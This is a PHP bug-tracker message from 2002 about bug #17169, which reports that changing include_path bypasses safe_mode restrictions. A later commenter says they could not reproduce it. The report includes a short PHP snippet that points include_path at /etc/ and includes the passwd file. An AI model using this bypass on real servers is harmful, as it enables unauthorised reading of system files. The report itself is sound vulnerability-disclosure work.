Bug #17169 Updated: include_path allows bypass of safe_mode
| From: | sitnikov at infonet dot ee | Date: | Mon, 13 May 2002 07:35:51 +0000 |
| Subject: | Bug #17169 Updated: include_path allows bypass of safe_mode | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-7509@lists.php.net to get a copy of this message | ||
ID: 17169
Updated by: sitnikov@infonet.ee
Reported By: ilia@prohost.org
Status: Open
Bug Type: Performance problem
Operating System: Linux 2.4.18
PHP Version: 4.2.0
New Comment:
I has test this on 4.1.2 & 4.2.0 and it not work for me.
Previous Comments:
------------------------------------------------------------------------
[2002-05-12 19:16:58] ilia@prohost.org
By setting include_path setting to any directory readable to the
webserver it is possible to read files from the directory regardless of
safe_mode limitations.
Ex.
<?php
ini_set('include_path', '/etc/');
include('passwd');
?>
------------------------------------------------------------------------
--
Edit this bug report at http://bugs.php.net/?id=17169&edit=1